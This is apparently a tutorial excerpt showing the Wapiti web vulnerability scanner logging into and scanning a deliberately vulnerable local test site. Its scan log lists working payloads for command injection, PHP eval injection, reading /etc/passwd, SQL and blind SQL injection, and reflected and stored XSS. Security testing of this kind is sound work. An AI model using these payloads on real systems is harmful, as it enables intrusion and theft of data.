Sie sind auf Seite 1von 5

First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json : bash-4.

2$ python bin/wapiti-getcookie /tmp/cookies.json http://127.0.0.1/vuln/lo gin.php <Cookie PHPSESSID=OLPNLIEBPEFELBIFGMKJEKOD for 127.0.0.1/> Please enter values for the following form: url = http://127.0.0.1/vuln/login.php username (default) : admin password (letmein) : secret <Cookie PHPSESSID=OLPNLIEBPEFELBIFGMKJEKOD for 127.0.0.1/> It can also be done with wapiti-cookie this way : python bin/wapiti-cookie /tmp/cookies.json http://127.0.0.1/vuln/login.php usern ame=admin password=secret Then, I scan the vulnerable website using the cookie and excluding the logout sc ript : bash-4.2$ wapiti http://127.0.0.1/vuln/ -c cookies.json -x http://127.0.0.1/vuln /logout.php Wapiti-2.3.0 (wapiti.sourceforge.net) Note ======== This scan has been saved in the file /home/audit/.wapiti/scans/127.0.0.1.xml You can use it to perform attacks without scanning again the web site with the " -k" parameter [*] Loading modules: mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htacces s, mod_blindsql, mod_permanentxss, mod_nikto [+] Launching module exec Command execution in http://127.0.0.1/vuln/exec/system.php via injection in the parameter host Evil url: http://127.0.0.1/vuln/exec/system.php?host=%3Benv Command execution in http://127.0.0.1/vuln/exec/passthru.php via injection in th e parameter host Evil url: http://127.0.0.1/vuln/exec/passthru.php?host=%3Benv Timeout occured in http://127.0.0.1/vuln/exec/shell_exec.php Evil url: http://127.0.0.1/vuln/exec/shell_exec.php?host=a%60sleep%20600%60 Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%3Benv PHP evaluation in http://127.0.0.1/vuln/exec/eval.php via injection in the param eter code Evil url: http://127.0.0.1/vuln/exec/eval.php?code=a%3Bexit%28base64_decode%28 %27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F [+] Launching module file Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%2Fetc%2Fpasswd Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/inclu de_get_simple.php via injection in the parameter f Evil url: http://127.0.0.1/vuln/include/include_get_simple.php?f=%2Fetc%2Fpass wd File disclosure vulnerability in include_path in http://127.0.0.1/vuln/include/r eadfile_get_simple.php via injection in the parameter f Evil url: http://127.0.0.1/vuln/include/readfile_get_simple.php?f=.depdb Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/inclu

de_get_post_conditional.php?id=2 via injection in the parameter f Evil request: POST /vuln/include/include_get_post_conditional.php?id=2 HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2 Content-Type: application/x-www-form-urlencoded f=%2Fetc%2Fpasswd [+] Launching module sql Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%BF%27%22%28 MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the para meter login Evil url: http://127.0.0.1/vuln/sql/login.php?login=%BF%27%22%28&password=test MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the para meter password Evil url: http://127.0.0.1/vuln/sql/login.php?login=test&password=%BF%27%22%28 MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter login Evil request: POST /vuln/sql/login_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post.php Content-Type: application/x-www-form-urlencoded login=%BF%27%22%28&password=letmein MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter password Evil request: POST /vuln/sql/login_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post.php Content-Type: application/x-www-form-urlencoded login=default&password=%BF%27%22%28 [+] Launching module xss XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get.php via injection in t he parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get.php?firstname=James&vuln=%3C%2F textarea%3E%3Cscript%3Ealert%28%27w3xanau7e6%27%29%3C%2Fscript%3E&lastname=Bond XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_text_script.php via in jection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_text_script.php?vuln=String.fro mCharCode%280%2Cwv503afd6b%2C1%29 XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_noscript.php via injec tion in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_noscript.php?vuln=%3C%2Ftextare a%3E%3C%2Fp%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28%27wfalvx3r3y%27% 29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php via inject ion in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php?vuln=%3C%2Ftextarea %3E%3Cscript%3Ealert%28%27wjl4df7rtf%27%29%3C%2Fscript%3E&id=2 XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_query_string.php via injec tion in the query string

Evil url: http://127.0.0.1/vuln/xss/xss_in_query_string.php?%3Cscript%3Ealert% 28%27w1jnjlqhnq%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_php_self.php via injection in the resource path Evil url: http://127.0.0.1/vuln/xss/xss_in_php_self.php/%3Cscript%3Ephpselfxss ()%3C/script%3E XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php v ia injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname= James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wrb6hruotv%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post.php via injection in the parameter vuln Evil request: POST /vuln/xss/xss_in_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/xss_in_post.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w1f18 1ucnr%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2F script%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post_url.php?style=%22%3E% 3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E via injection in the parameter style Evil request: POST /vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28% 27wpk5q4ybjo%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/xss_in_post_url.php Content-Type: application/x-www-form-urlencoded username=Enter%20your%20username [+] Launching module blindsql Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=sleep%287%29%231 Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injecti on in the parameter login Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=%27%20or%20sleep%287 %29%231&password=test Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injecti on in the parameter password Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=test&password=%27%20 or%20sleep%287%29%231 Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via in jection in the parameter login Evil request:

POST /vuln/sql/login_post_blind.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post_blind.php Content-Type: application/x-www-form-urlencoded login=%27%20or%20sleep%287%29%231&password=letmein Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via in jection in the parameter password Evil request: POST /vuln/sql/login_post_blind.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post_blind.php Content-Type: application/x-www-form-urlencoded login=default&password=%27%20or%20sleep%287%29%231 [+] Launching module permanentxss Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27w1rc0mzxmd%27%29%3C%2F script%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_dire ct.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2F script%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get.php v ia injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get.php?firstname=James&l astname=Bond&vuln=%3Cscript%3Ealert%28%27we37lsoicn%27%29%3C%2Fscript%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direc t.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname= James&lastname=Bond&vuln=wrb6hruotv Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direc t.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname= James&lastname=Bond&vuln=wrb6hruotv Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_resu lt_elsewhere_submit.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere.php Content-Type: application/x-www-form-urlencoded

firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wewjm7d17s%27%29%3C%2F script%3E Report -----A report has been generated in the file /home/audit/.wapiti/generated_report Open /home/audit/.wapiti/generated_report/index.html with a browser to see this report.